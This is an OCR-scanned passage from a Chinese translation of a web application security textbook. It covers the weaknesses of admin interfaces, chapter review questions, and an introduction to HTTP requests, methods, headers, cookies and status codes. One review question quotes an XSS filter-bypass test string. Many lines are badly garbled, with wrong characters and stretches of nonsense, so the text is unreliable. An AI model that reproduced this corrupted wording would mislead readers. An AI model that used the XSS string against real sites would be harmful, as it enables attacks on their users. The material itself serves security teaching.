提升 权限 ， 以 下 举例 说 明 。 
WD PHP Nuke Powered Sie Ardminiaration Menu Merits Firefer m E fe) 


Fle fdn View History Bookmarks Toots Help 


<] "C A EEEE re mse re phpouke yim.php W- cook 万 


图 2-8 ”Web 应 用 程序 中 的 管理 界面 


口号 份 准 证 机 制 中 存在 的 落 弱 环节 使 攻击 者 能 够 获得 管理 员 权 
限 ， 迅 速 攻破 整个 应 用 程序 。 

口 许多 应 用 程序 并 不 对 它 的 一 些 管理 功能 执行 有 效 的 访问 控制 。 
利用 这 个 漏洞 ， 攻 击 者 可 以 建立 一 个 拥有 强大 特权 的 新 用 户 账户 。 

O 管理 功能 通常 能 够 显示 普通 用 户 提交 的 数据 。 管 理 界 面 中 存在 
的 任何 器 站 点 脚本 缺陷 都 可 能 危及 用 户 会 话 的 安全 。 


口 因为 管理 用 户 被 视 为 可 信用 户 ， 或 者 由 于 渗透 测试 员 只 能 访问 
低 权 限 的 账户 ， 所 以 管理 功能 往往 没有 经 过 严格 的 安全 测试 而且， 
它 通常 需要 执行 相当 危险 的 操作 ， 包 括 访问 磁盘 上 的 文件 或 操作 系统 
命令 。 如 果 一 名 攻击 者 能 够 攻破 管理 功能 ， 吕 能 利用 它 控制 整个 服务 
BR o 


2.5 小结 


尽管 存在 巨大 老 异 ， 但 几乎 所 有 的 Web 应 用 程序 都 以 某 种 形式 采 
用 相同 的 核心 安全 机 制 。 这 些 机 制定 应 用 程序 应 对 恶意 用 户 所 采取 的 
主要 防御 措施 ， 因 而 应 用 程序 的 受 攻击 面 大 部 分 也 由 它们 构成 。 我 们 
在 本 书后 面 介绍 的 漏洞 也 主要 源 于 这 些 核心 机 制 中 存在 的 缺陷 。 

在 这 些 机 制 中 ， 处 理 用 户 访问 和 用 户 输 入 的 机 制 是 最 重要 的 机 
制 。 当 针对 应 用 程序 发 动 攻 击 时 ， 它 们 将 成 为 主要 攻击 对 象 。 利 用 这 
些 机 制 中 存在 的 缺陷 通常 可 以 完全 攻破 整个 应 用 程序 ， 使 攻击 者 能 够 
访问 其 他 用 户 的 数据 、 执 行 示 授权 操作 以 及 注入 任意 代码 和 命令 。 


2.6 Ù 


欲 知 问题 答案 ， 请 访问 http:/mdsec.netwahh[2] 。 
P 为 什么 说 应 用 程序 处 理 用 户 访问 的 机 制 是 所 有 机 制 中 最 薄弱 
|? 

(2) 会 话 与 会 话 令 牌 有 何不 同 ? 
(3) 为 何不 可 能 始终 使 用 基于 白 名 单 的 方法 进行 输入 确认 ? 
(4) 攻击 者 正在 攻击 一 个 执行 管理 功能 的 应 用 程序 ， HEDRA 
使 用 这 项 功能 的 任何 有 效 证 书 。 为 何 他 仍然 应 当 密 切 关 注 这 项 功能 


We? 
(5) 下 在 阻止 跨 站 点 脚本 攻击 的 输入 确认 机 制 按 以 下 顺序 处 理 一 
个 输入 : 


) 删除 任何 出 现 的 <script> 表 达 式 ; 

) 将 输入 截 短 为 50 个 字符 ; 

) 删除 输入 中 的 引号 ; 

) 对 输入 进行 URL 人 解码 ; 

) 如 果 任 何 输入 项 被 删除 ， 返 回 步 台 (1) 。 
否 能 够 避 开 上 述 确 认 机 制 ， 让 以 下 数据 通过 确认 ? 


"><script>alert ( "foo" }</seript> 


(a 
(b 
(c 
(d 
(e 


在 软件 环境 中 ， 受 攻击 面 (attack surface) 是 指 对 未 通过 验证 的 用 户 

的 有 效 切 能 ， 也 就 是 说 ， 未 通过 验证 的 用 户 通过 软件 的 默认 配置 能 够 

达到 什么 目的 。 译 者 注 

DB] 答案 的 中 文 版 请 参阅 图 灵 社 区 本 书页 面 
(http://www.ituring.com.cn/book/885), =% 

http://blog.sina.com.cn/s/blog_545eb7860101379s.html。 一 一 译 者 注 


第 3 章 
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Web 应 用 程序 使 用 各 种 不 同 的 技术 实现 其 功能 。 本 章 简要 介绍 渗 
透 测 试 员 在 攻击 Web 应 用 程序 时 可 能 遇 到 的 关键 技术 。 我 们 将 分 析 
HTTP 协 议 、 服 务 器 和 客户 端 常 用 的 技术 以 及 用 于 在 各 种 情形 下 呈现 数 
据 的 编码 方案 。 这些 技 术 大 都 简 单 易 民 ， 掌 握 其 相关 特性 对 于 同 Web 
应 用 程序 发 动 有 效 攻 击 极 其 重要 。 

如 果 读 者 已 经 熟悉 Web 应 用 程序 所 使 用 的 天 键 技术 ， 可 以 快速 浏 
览 本 章 内 容 ， 确 定 其 中 没有 不 了 解 的 技术 。 如 采 还 在 学 习 Web 应 用 程 
序 的 工作 原理 ， 那 么 在 继续 阅读 分 析 特 殊 调 洞 的 后 续 草 下 前 ， 应 当先 
阅读 本 章 内 容 。 为 了 进一步 学 习 本 书后 续 章 书 涉 及 的 内 容 ， 我 们 推荐 
读者 阅读 David Gourley 和 了 Brian Totty 合 车 的 ETTP: The Definitive Guide 
一 书 (O'Reilly, 2002) ， 也 可 在 万 维 网 联盟 网 站 (www.w3.02g) 上 
阅读 电子 版 。 


3.1 HTTP 


HTTP (HyperText Transfer Protocol， 超 文本 传输 协议 ) 是 访问 万 
维 网 使 用 的 核心 通信 协议 ， 也 是 今天 所 有 Web 应 用 程序 使 用 的 通信 协 
议 。 最 初 ，HTTP 只 是 一 个 为 获取 基于 文本 的 静态 资源 而 开发 的 简单 协 
议 ， 后 来 人 们 以 各 种 形式 扩展 和 利用 它 ， 使 其 能 够 支持 如 今 常 见 的 复 
杂 分 布 式 应 用 程序 。 

HTTP 使 用 一 种 基于 消息 的 模型 .客户 端 送出 一 条 请 求 消息 ， 而 后 
由 服务 絮 返 回 一 条 响应 消 筷 。 该 协议 基本 上 不 需要 连接 ， 虽 然 HTTP 使 
用 有 状态 的 TCP 协 议 作 为 它 的 传输 机 制 ， 但 每 次 请 求 与 啊 应 交换 都 目 
动 完成 ， 并 且 可 能 使 用 不 同 的 TCP 连 接 。 


3.1.1 HTTP 请 求 


所 有 HTTP 消 息 《请求 邱 响应 ) 中 都 包含 一 个 或 几 个 单行 显示 的 消 
FAX (header) ， 然 后 是 一 个 强制 空白 行 ， 最 后 是 消息 主体 (可 
选 ) 。 以 下 是 一 个 典型 的 HTTP 请 求 : 


GET /auth/488/YourDetails.ashx?uid=129 HTTP/1.1 


Accept: application/x-ms-application, image/jpeg, application/xamlt+xnl, 
image/gif, image/pjveg, application/x-ms-xbap, application/x-shockwave 
flash, */* 

Referer: https://mdsec.net/auth/488/Home.ashx 


Accept-Language: en-GB 


User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WON64; 
Trident /4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 
3.0.30729; .NET4.0C; InfoPath.3; .NET4.0E; FDM; .NET CLR 1.1.4322) 
Accept-Encoding: gzip, deflate 

Host: mdsec.net 

Connection: Keep-Alive 

Cookie: SessionTG=5870C71F3FD49683935CD36682F545476 


每 个 HTTP 请 求 的 第 一 行 都 由 3 个 以 空格 间隔 的 项 目 组 成 。 

口 一 个 说 明 HTTP 方 法 的 动词 。 最 常用 的 方法 为 GET， 它 的 主要 作 
用 是 从 Web 服 务 器 获取 一 个 资源 。GET 请 求 并 没有 消息 主体 ， 因 此 在 
消息 头 后 的 空白 行 中 没有 其 他 数据 。 


口 所 请 求 的 URL。 该 URL 通 常 由 所 请 求 的 资源 名 称 ， 以 及 一 个 包 
含 客户 端 辣 该 资源 提交 的 参数 的 可 选 查询 字符 串 组 成 。 在 该 URL 中 ， 
a ee ae ae ee 

口 使 用 的 HTTP 版 本 。 因 特 网 上 常用 的 HTTP 版 本 为 1.0 和 1.1， 多 数 
浏览 絮 默 认 使 用 1.1 版 本 。 这 两 个 版 本 的 规范 之 间 存 在 一 些 差 异 ; 然 
而 ， 当 攻击 web 应 用 程序 时 ， 渗 透 测 试 员 可 能 遇 到 的 唯一 差异 是 1.1 版 
本 必须 使 用 Host 请 求 头 。 

请 求 示 例 中 的 其 他 一 些 要 点 如 下 。 

口 Referer 消 息 头 用 于 表示 发 出 请 求 的 原始 URL (例如 ， 因 为 用 户 
单 击 页 面 上 的 一 个 链接 ) 。 请 注意 ， 在 最 初 的 HTTP 规 范 中 ， 这 个 消息 
头 存在 拼写 错误 ， 并 且 这 个 错误 一 直 保留 了 下 来 。 

口 User-Agent 消 息 头 提供 与 浏 贤 器 或 其 他 生成 请 求 的 客户 端 软 件 
有 关 的 信息 。 请 注意 ， 由 于 历史 原因 ， 大 多 数 浏 览 絮 中 都 包含 Mozilla 
前 级 。 这 是 因为 最 初 占 支配 地 位 的 Netscape 浏 览 絮 使 用 了 User-Agent 字 
符 串 ， 而 其 他 浏览 器 也 希望 让 Web 站 点 相信 它们 与 这 种 标准 兼容 。 与 
计算 领域 历史 上 的 许多 怪异 现象 一 样 ， 这 种 现象 变 得 很 普 裔 ， 即 使 当 
前 版 本 的 Internet Explorer 也 保留 了 这 一 做 法 ， 示 例 的 请 求 即 由 Internet 
Explorer 提 出 ° 

口 Host 消 息 头 用 于 指定 出 现在 被 访问 的 完整 URL 中 的 主机 名 称 。 
如 果 几 个 Web 站 点 以 相同 的 一 台 服 务 器 为 主机 ， 束 需要 使 用 Host 消 筷 
头 ， 因 为 请 求 第 一 行 中 的 URL 内 通常 并 不 包含 主机 名 称 (请 参阅 第 17 
章 了 解 更 多 与 虚拟 主机 Web 站 点 有 关 的 信息 ) 。 

DCookie 消 息 头 用 于 提交 服务 器 回 客 户 端 发 布 的 其 他 参数 (请 参 
阅 本 章 后 续 内 容 了 解 更 多 详情 ) 。 


3.1.2 HTTP 响应 


以 下 是 一 个 典型 的 HTTP 啊 应 ; 


RTTP/1.1 200 OK 

Date: Tue, 19 Apr 2011 09:23:32 GMT 

Server: Microsoft-IIS/6.0 

X-Powered-By: ASP.NET 

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSwe 
X-AspNet-Version: 2.0.50727 


Prag nt sach 
Exp. hu, 9 Jan 197 10:00:00 GMT 
Content-Type: html charse 3 
onten ngt 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htto:// 


www.w3.org/TR/xhtml11/DTR/xhtmii-transitional.dtd"><html xmins="http: // 


jw.w3.org/1999/xhtml" ><head><title>Your detail ltitle 


每 个 HTTP 响 应 的 第 一 行 由 3 个 以 空格 间隔 的 项 目 组 成 。 

口 使 用 的 HTTP 版 本 。 

口 表示 请 求 结 果 的 数字 状态 码 。200 是 最 常用 的 状态 码 ， 它 表示 成 
功 提交 了 请 求 ， 正 在 返回 所 请 求 的 资源 。 

口 一 段 文本 形式 的 “原因 短语 ”， 进 一 步 说 明 响应 状态 。 这 个 短语 
中 可 包含 任何 值 ， 当 前 浏览 右 不 将 其 用 于 任何 目的 。 

响应 示例 中 的 其 他 一 些 要 点 如 下 。 

口 Server 消 轧 头 中 包含 一 个 旗 标 ， 指 明 所 使 用 的 Web 服 务 絮 软件 。 
有 时 还 包括 其 他 信息 ， 如 所 安装 的 模块 和 服务 器 操作 系统 。 其 中 包含 
的 信息 可 能 并 不 准确 。 

J Set-Cookie) SK Ia i as LIRA —‘ cookie, EERE AIA AR 
Bas LIAN Wak P A Cookie ERRE] ° 

g Pragma) BAJERA ot ast NEG IY RAE TERTIT Expires] 4 
息 头 指出 啊 应 内 容 已 经 过 期 ， 因 此 不 应 保存 在 缓存 中 。 当 返回 动态 内 
容 时 和 常常 会 发 送 这 些 指 令 ， 以 确保 浏览 絮 随 时 获得 最 新 内 容 。 

口 几乎 所 有 的 HTTP 响 应 在 消息 头 后 的 空白 行 下 面 都 包含 消 忆 主 
体 ，Content-Type 消 息 头 表示 这 个 消息 主体 中 包含 一 个 HTML 文 档 。 

口 Content-Length 消 息 头 规定 消息 主体 的 字 节 长 度 。 


3.1.3 HTTP 方 法 


当 渗 透 测 试 员 攻 击 Web 应 用 程序 时 ， 几 乎 肯定 会 遇 到 最 常用 的 方 
法 : GET 和 POST。 这 些 方 法 之 则 存在 一 些 必须 了 解 的 重要 差异 ， 名 上 略 
这 些 差 异 可 能 会 危及 应 用 程序 的 安全 。 

GET 方 法 的 作用 在 于 获取 资源 。 它 可 以 用 于 URL 查 询 字 符 串 的 形 
式 向 所 请 求 的 资源 发 送 参 数 。 这 使 用 户 可 将 一 个 包含 动态 资源 的 URL 
标注 为 书签 ， 用 户 自 己 或 其 他 用 户 随后 可 重复 利用 该 书签 来 获取 等 价 
的 资源 (作用 与 标注 为 书签 的 搜索 查询 相似 ) 。UREL 显 示 在 屏幕 上 ， 
并 被 记录 在 许多 地 方 ， 如 浏览 器 的 历史 记录 和 和 Web 服务器 的 访问 日 志 


中 。 如 果 单 击 外 部 链接 ， 还 可 以 用 Referer 消 息 头 将 它们 传送 到 其 他 站 
点 。 因 此 ， 请 勿 使 用 查询 字符 串 传送 任何 敏感 信息 。 

POST 方 法 的 主要 作用 是 执行 操作 。 使 用 这 个 方法 可 以 在 URL 查 询 
字符 串 与 消息 主体 中 发 送 请 求 参 数 。 尽 管 仍然 可 以 将 URL 标 注 为 书 
签 ， 但 书签 中 并 不 包含 消息 主体 发 送 的 任何 参数 。 许 多 维护 URL 日 志 
的 位 置 及 Referer 消 息 头 也 将 这 些 参数 排除 在 外 。 因 为 POST 方法 旨 在 技 
行 操 作 ， 如 果 用 户 单 击 浏览 右上 的 “后 退 ” 按 钮 ， 返 回 一 个 使 用 这 种 方 
ERAN TH, FAM DARA AMM Aika, Me RARE 
的 操作 辐 用 户 发 出 警告 ， 如 图 3-1 所 示 。 这 样 做 可 防止 用 户 无 意 中 多 次 
执行 同一 个 操作 。 因 此 ， 在 执行 某 一 操作 时 必须 使 用 POST 请 求 。 


[se 


To display this page, Firefox must send information that will repeat any action (such as a search cr 
order confirmation) that was performed earlier. 


| Resend | Cancel 


图 3-1 浏览 器 不 会 自动 重新 发 送 用 户 提 出 的 POST 请 求 ， 因 为 这 样 做 会 导致 多 次 执 


行 东 一 操作 


除了 GET 和 POST 方法 以 外 ，HTTP 协 议 还 支持 许多 其 他 因 特 殊 目 
的 而 建立 的 方法 。 需 要 了 解 的 其 他 方法 如 下 。 

口 HEAD。 这 个 方法 的 功能 与 GET 方 法 相似 ， 不 同 之 处 在 于 服务 
絮 不 会 在 其 啊 应 中 返回 消息 主体 。 服 务 器 返回 的 消息 头 应 与 对 应 GET 
请 求 返 回 的 消息 头 相同 。 因 此 ， 这 种 方法 可 用 于 检查 某 一 资源 在 向 其 
提交 GET 请 求 前 是 否 存 在 。 

口 TRACE。 这 种 方法 主要 用 于 诊断 。 服 务 器 应 在 啊 应 主体 中 返回 
其 收 到 的 请 求 消 息 的 具体 内 容 。 这 种 方法 可 用 于 检测 客户 端 与 服务 器 
之 间 是 否 存 在 任何 操纵 请 求 的 代理 服务 器 。 

口 OPTIONS。 这 种 方法 要 求 服务 器 报告 对 某 一 特殊 资源 有 效 的 
HTTP 方 法 。 服 务 器 通常 返回 一 个 包含 Allow 消 息 头 的 响应 ， 并 在 其 中 
列 出 所 有 有 效 的 方法 。 

口 PUT。 这 个 方法 试图 使 用 包含 在 请 求 主体 中 的 内 容 ， 向 服务 器 
上 传 指定 的 资源 。 如 果 激 活 这 个 方法 ， 渗 透 测试 员 就 可 以 利用 它 来 攻 
击 应 用 程序 。 例 如 ， 通 过 上 传 任意 一 段 脚本 并 在 服务 器 上 执行 该 脚本 
来 攻击 应 用 程序 。 

还 有 许多 其 他 与 攻击 Web 应 用 程序 没有 直接 关系 的 HTTP 方 法 。 然 
而 ， 如 果 激 活 某 些 危险 的 方法 ，Web 服 务 器 可 能 面临 攻击 风险 。 请 参 


阅 第 18 章 了 解 更 多 关于 这 些 方 法 的 详情 ， 以 及 在 攻击 中 使 用 它们 的 示 
Bill ° 


3.1.4 URL 


URL (Uniform Resource Locator， 统 一 资源 定位 符 ) 是 标识 Web 
资源 的 唯一 标识 人 特 ， 通 过 它 即 可 获取 其 标识 的 资源 。 最 常用 的 URL 格 
式 如 下 : 


protocol://hostname[:port]/[path/]file[?param=value] 


这 个 结构 中 有 几 个 部 分 是 可 选 的 。 如 果 端 口号 与 相关 协议 使 用 的 
默认 值 不 同 ， 则 只 包含 端口 号 即 可 。 用 于 生成 前 面 的 HTTP 请 求 的 URL 


https://mdsec.net/auth/488/YourDetails.ashx?uid=129 


除 这 种 绝对 形式 外 ， 还 可 以 相对 某 一 特殊 主机 或 主机 上 的 一 个 特 
殊 路 径 指定 URL， 例 如 ; 
/auth/488/YourDetails.ashx?uid=129 


YourDetails.ashx?uid=129 


Web 页 面 常常 使 用 这 些 相对 形式 描述 Web 站 点 或 应 用 程序 中 的 导 
fi» 


所 7 ”注解 URL 的 正确 技术 术语 实际 为 URI (Uniform Resource 


Identifier， 统 一 资源 标识 符 ) ， 但 这 一 术语 仅 用 于 正式 规范 中 ， 或 
者 被 那些 希望 炫耀 学 识 的 人 所 使 用 。 


3.1.5 REST 


表述 性 状态 转移 (REST) 是 分 布 式 系统 的 一 种 体系 架构 ， 在 这 类 
体系 架构 中 ， 请 求 和 响应 包含 系统 资源 当前 状态 的 表述 。 万 维 网 ， 包 
Co 中 使 用 的 核心 技术 ， 均 符合 REST 体 系 架 构 风 


虽然 在 查询 字符 串 中 包含 参数 的 URL 本 二 遵循 REST 约 束 ， 
但 “REST 风 格 的 URL” 一 词 通常 指 在 URL 文 件 路 径 而 非 查 询 字 符 串 中 包 
含 参数 的 URL。 例 如 ， 下 面 这 个 包含 查询 字符 串 的 URL: 


http: //wahh-app.com/search?make=ford&model=pinto 


与 以 下 包含“REST 风 格 ” 参 数 的 URL 相 对 应 : 


http://wahh-app.com/search/ford/pinto 


在 第 4 章 中 ， 我 们 将 讨论 如 何在 解析 应 用 程序 的 内 容 和 功能 、 以 及 
确定 其 受 攻击 面 时 处理 这 些 不 同 风格 的 参数 。 


3.1.6 。 HTTP 消息 头 


HTTP 文 持 许多 不 同 的 消息 头 ， 其 中 一 些 专用 于 特殊 用 途 。 一 些 消 
县 头 可 用 在 请 求 与 啊 应 中 ， 而 其 他 一 些 消 息 头 只 能 专门 用 在 某 个 特定 
° 下 面 列 出 渗透 测试 员 在 攻击 Web 应 用 程序 时 可 能 过 到 的 消 
局 头 ° 
1. 常用 消息 头 
口 Connection。 这 个 消息 头 用 于 告诉 通信 的 男 一 端 ， 在 完成 HTTP 
传输 后 是 天 闭 TCP 连 返 ， 还 是 保持 连接 开放 以 接收 其 他 消息 。 
口 Content-Encoding。 这 个 消 轧 头 为 消息 主体 中 的 内 容 指定 编码 形 
式 (如 gzip) ， 一 些 应 用 程序 使 用 它 来 压缩 啊 应 以 加 快 传输 速度 。 
口 Content-Length。 这 个 消息 头 用 于 规定 消息 主体 的 字 节 长 上 度 。 

ad 它 在 对 应 的 GET 请 求 的 啊 应 中 指出 主体 的 

长 度 。) 

口 Content-Type。 这 个 消 恩 头 用 于 规定 消 轧 主体 的 内 容 类 型 。 例 
如 ，HTML 文 档 的 内 容 类 型 为 text/html ° 

口 Transfer-Encoding。 这 个 消 轧 头 指定 为 方便 其 通过 HTTP 传 输 而 
加 消息 主体 使 用 的 任何 编码 。 如 采 使 用 这 个 消息 头 ， 通 常用 它 指 定 块 
编码 。 

2. 请 求 消息 头 

口 Accept。 这 个 消息 头 用 于 告诉 服务 器 客户 端 愿意 接受 哪些 内 
容 ， 如 图 像 类 型 、 办 公文 档 格式 等 。 

口 Accept-Encoding。 这 个 消 妃 头 用 于 告诉 服务 右 ， 客 户 端 愿意 接 
受 哪些 内 容 编码 。 


口 Authorization。 这 个 消息 头 用 于 为 一 种 内 置 HITP 号 份 难 证 回 服 
Sarthe Cue Hh ° 

口 Cookie。 这 个 消 恩 头 用 于 同 服务 絮 提 交 它 以 前 发 布 的 cookie。 
oo Host。 这 个 消息 头 用 于 指定 出 现在 所 请 求 的 完整 UREL 中 的 主机 
yy ° 
g If-Modified-Since ° 3X75 ASK FA FB i ot ar — UP 
请 求 的 资源 的 时 间 。 

如 果 自 那 以 后 资源 没有 发 生变 化 ， 服 务 絮 就 会 发 出 一 个 带 状 态 码 
304 的 响应， 指示 客户 端 使 用 资源 的 缓存 副本 。 

DI-None-Match。 这 个 消息 头 用 于 指定 一 个 实体 标签 。 实 体 标签 
是 一 个 说 明 消息 主体 内 容 的 标识 符 。 当 最 后 一 次 收 到 所 请 求 的 资源 
时 ， 浏 蜗 器 提交 服务 器 发 布 的 实体 标签 。 服 务 絮 可 以 使 用 实体 标签 确 
定 浏 贤 絮 是 否 使 用 资源 的 绥 存 副本 。 

口 Origin。 这 个 消息 头 用 在 跨 域 Ajax 请 求 中 ， 用 于 指示 提出 请 求 的 
H (请 参阅 第 13 章 了 解 相关 内 容 ) 。 

口 Referer。 这 个 消息 头 用 于 指示 提出 当前 请 求 的 原始 URL 。 

口 User-Agent。 这 个 消 恩 头 提 供与 浏览 絮 或 生成 请 求 的 其 他 客户 
端 软件 有 关 的 信息 。 

3. 了 响应 消息 头 
口 Access-Control-Allow-Origin。 这 个 消息 头 用 于 指示 可 否 通过 跨 
域 Ajax 请 求 获取 资源 。 
ee ° 这 个 消息 头 用 于 癌 浏 览 器 传送 缓存 指令 (如 M- 
cache) ° 
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请 求 中 提交 这 个 标识 符 ， 获 得 和 If-None-Match 消 息 头 中 相同 的 资源 ， 
通知 服务 硕 浏 览 右 当前 缓存 中 保存 的 是 哪个 版 本 的 资源 。 

口 Expires。 这 个 消息 头 用 于 同 浏 贤 锅 说 明 消 息 主 体内 容 鸭 有 效 时 
间 。 在 这 个 时 间 之 前 ， 浏 览 喜 可 以 使 用 这 个 资源 的 缓存 副本 。 

口 Location。 这 个 消息 头 用 于 在 重 定 向 响应 (那些 状态 码 以 3 开头 
的 响应 ) 中 说 明 重 定向 的 目标 。 

口 Pragma。 这 个 消息 头 用 于 辐 浏 览 吉 传 送 缓存 指令 (如 no- 


cache) 。 

口 Server。 这 个 消息 头 提 供 所 使 用 的 web 服务 器 软件 的 相关 信息 。 
口 Set-Cookie。 这 个 消息 头 用 于 辐 浏 览 器 发 布 cookie， 浏 跑 器 会 在 
随后 的 请 求 中 将 其 返回 给 服务 器 。 


[© 


口 WWW-Authenticate。 这 个 消息 头 用 在 带 401 状 态 码 的 啊 应 中 ， 


提供 与 服务 器 所 支持 的 身份 验证 美 型 有 天 的 信息 。 
口 X-Frame-Options。 这 个 消 轧 头 指 示 浏 贤 器 框架 是 否 及 如 何 加 载 


当前 响应 (请 参阅 第 13 章 了 解 相 关内 容 ) 


3.1.7 cookie 


cookie 是 大 多 数 Web 应 用 程序 所 依赖 的 HTTP 协 议 的 一 个 关键 组 成 
部 分 ， 攻 击 者 常常 通过 它 来 利用 Web 应 用 程序 中 的 漏洞 。 服 务 需 使 用 
cookie A Pig IRAE, AP ie Pe FE cookie +k} Lik ZB ARS 

。 与 其 他 类 型 的 请 求 参 数 〈 存 在 于 URL 查 询 字 符 串 或 消息 主体 中 ) 
不 同 无 须 应 用 程序 或 用 户 采 取 任 何 特殊 措施 ， 随 后 的 每 一 个 请 求 都 


会 继续 重新 问 服务 器 提交 cookie 。 
如 前 所 述 ， 服 务 器 使 用 Set-Cookie 呆 应 消息 头发 布 cookie: 


Set-Cookie: tracking=tI8rk7]joMx44S2Uu85nSWc 


然后 ， 用 户 的 浏览 絮 目 动 将 下 面 的 消 轧 头 添加 到 随后 返回 给 同一 
服务 器 的 请 求 中 ， 


Cookie: tracking=tI8rk7joMx44S2Uu85nSWe 


如 上 所 示 ，cookie 一 般 由 一 个 名 / 值 对 构成 ， 但 也 可 包含 任何 不 含 
空格 的 字符 串 。 可 以 在 服务 器 响应 中 使 用 几 个 Set-Cookie 消 恩 头 发 布 多 
个 cookie， 并 可 在 同一 个 Cookie 消 妃 头 中 用 分 号 分 隅 不 同 的 cookie， 将 
它们 全 部 返回 给 服务 器 。 

除 cookie 的 实际 值 外 ，Set-Cookie 消 息 头 还 可 包含 以 下 任何 可 选 属 
性 ， 用 它们 控制 浏览 絮 处 理 cookie 的 方式 。 

口 expires。 用 于 设 定 cookie 的 有 效 时 间 。 这 样 会 使 浏览 絮 将 cookie 
保存 在 永久 性 的 存储 器 中 ， 在 随后 的 浏览 需 会 话 中 重复 利用 ， 直 到 到 
。 如 果 没 有 设 定 这 个 属性 ， 那 么 cookie 仅 用 在 当前 浏览 妖 
会 话 中 。 
口 domain。 用 于 指定 cookie 的 有 效 域 。 这 个 域 必须 和 收 到 cookie 的 
域 相同 ， 或 者 是 它 的 父 域 。 

口 path。 用 于 指定 cookie 的 有 效 URL 路 径 。 

口 secure。 如果 设 置 这 个 属性 ， 则 仪 在 HTTPS 请 求 中 提交 cookie ° 


口 HttpOnly。 如 果 设 置 这 个 属性 ， 将 无 法 通过 客户 问 JavaScript 直 
接 访 问 cookie。 

上 述 每 一 个 cookie 属 性 都 可 能 影响 应 用 程序 的 安全 ， 其 造成 的 主 
要 不 利 影响 在 于 攻击 者 能 够 直接 对 应 用 程序 的 其 他 用 户 发 动 攻击 。 请 
参阅 第 12 章 和 人 第 13 章 了 解 更 多 详情 。 


3.1.8 ”状态 码 


每 条 HTTP 啊 应 消息 都 必须 在 第 一 行 中 包含 一 个 状态 码 ， 说 明 请 来 
的 结果 。 根 据 代码 的 第 一 位 数字 ， 可 将 状态 码 分 为 以 下 5 类 。 
1xx 一 一 提供 信息 。 
口 2xx 一 一 请 求 补 成 功 提交 。 
口 3xx 一 一 客户 问 人 被 重 定 问 到 其 他 资源 。 
口 4xx 一 一 请 求 包含 某 种 错误 。 
口 5xx 一 一 服务 絮 执 行 请 求 时 过 到 错误 。 

还 有 大 量 特殊 状态 码 ， 其 中 许多 状态 码 仪 用 在 特殊 情况 下 。 下 面 
列 出 渗透 测试 员 在 攻击 Web 应 用 程序 时 最 有 可 能 过 到 的 状态 码 及 其 相 
关 的 原因 短语 。 

口 100 Continue。 当 客户 端 提 区 一 个 包含 主体 的 请 求 时 ， 将 发 送 这 
个 响应 。 该 啊 应 表示 已 收 到 请 求 消息 头 ， 客 户 端 应 继续 发 送 主体 。 请 
求 完成 后 ， 再 由 服务 器 返回 男 一 个 响应 。 
= Ok。 本 状态 码 表 示 已 成 功 提 交 请 求 ， 旦 啊 应 主体 中 包含 请 
求 结果 。 
口 201 Created。PUT 请 求 的 啊 应 返回 这 个 状态 码 ， 表 示 请 求 已 成 
INGER 。 
口 301 Moved Permanently。 本 状态 码 将 浏 斋 器 永久 重 定 辐 到 另外 
一 个 在 Location 消 息 头 中 指定 的 URL。 以 后 客户 端 应 使 用 新 UREL 替 换 
原始 URL 。 

口 302 Found。 本 状态 码 将 浏览 器 暂时 重 定 同 到 另外 一 个 在 
Location 洗 局 大 中 指定 的 URL。 窗 户 端 应 在 随后 的 请 求 中 恢复 使 用 原 

HURL ° 

口 304 Not Modified。 本 状态 码 指 示 浏 览 辟 使 用 缓存 中 保存 的 所 请 
求 资源 的 副本 。 服 务 器 使 用 If-Modified-Since 与 -None-Match 消 息 头 人 确 
定 客 户 端 是 否 拥有 最 新 版 本 的 资源 。 


口 400 Bad Request。 本 状态 码 表示 客户 端 提 交 了 一 个 无 效 的 HTTP 
请 求 。 当 以 某 种 无 效 的 方式 修改 请 求 时 (例如 在 URL 中 插入 一 个 空格 
符 ) ， 可 能 会 遇 到 这 个 状态 码 。 

口 401 Unauthorized。 服 务 器 在 许可 请 求 前 要 求 HITP 进 行 身 份 验 
证 。WWW-Authenticate 消 息 头 详细 说 明 所 文 持 的 吴 份 验 证 类 型 。 

口 403 Forbidden 。 本 状态 码 指出 ， 不 管 是 否 通过 号 份 难 证 ， 禁 止 
任何 人 访问 被 请 求 的 资源 。 

口 404 Not Found。 本 状态 码 表 示 所 请 求 的 资源 并 不 存在 。 

口 405 Method Not Allowed。 本 状态 码 表示 指定 的 URL 不 文 持 请 求 
中 使 用 的 方法 。 例 如 ， 如 果 斌 图 在 不 支持 PUT 方 法 的 地 方 使 用 该 方 
法 ， 束 会 收 到 本 状态 码 。 

口 413 Request Entity Too Large ° 如果 在 本 地 代码 中 探查 缓冲 絮 光 
出 漏洞 并 就 此 提交 超 长 数据 串 ， 则 本 状态 码 表 示 请 求 主体 过 长 ， 服 务 
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g 414 Request URI Too Long。 与 前 一 个 响应 类 似 ， 本 状态 码 表 示 
请 求 中 的 URL 过 长 ， 服 务 器 无 法 处 理 。 

口 500 Internal Server Error ° 本 状态 码 表 示 服 务 器 在 执行 请 求 时 中 
到 错误 。 当 提交 无 法 预料 的 输入 、 在 应 用 程序 处 理 过 程 中 造成 无 法 处 
理 的 错误 时 ， 通 常会 收 到 本 状态 码 。 应 该 仔细 检查 服务 器 啊 应 的 所 有 
内 容 ， 了 解 与 错误 性 质 有 关 的 详情 。 

口 503 Service Unavailable。 通 常 ， 本 状态 码 表示 尽管 Web 服 务 器 
运转 正常 ， 并 且 能 够 啊 应 请 求 ， 但 服务 器 访问 的 应 用 程序 还 是 无 法 作 
出 啊 应 。 应 该 进行 核实 ， 是 否 因为 执行 了 某 种 行为 而 造成 这 个 结果 © 


3.1.9 HTTPS 


HTTP 使 用 普通 的 非 加 密 TCP 作 为 其 传输 机 制 ， 因 此 ， 处 在 网 络 适 
当 位 置 的 攻击 者 能 够 截取 这 个 机 制 。HTTPS 本 质 上 与 HTTP 一 样 ， 都 
属于 应 用 层 协议 ， 但 HITPS 通 过 安全 传输 机 制 一 一 安全 套 接 层 

(Secure Socket Layer, SSL) 一 一 传送 数据 。 这 种 机 制 可 保护 通过 网 
络 传送 的 所 有 数据 的 隐 密 性 与 完整 性 ， 显 车 降低 非 入 侵 性 拦截 攻击 的 
可 能 性 。 不 管 是 否 使 用 SSL 进 行 传输 ，HTTP 请 求 与 啊 应 都 以 完全 相同 
HI LF 


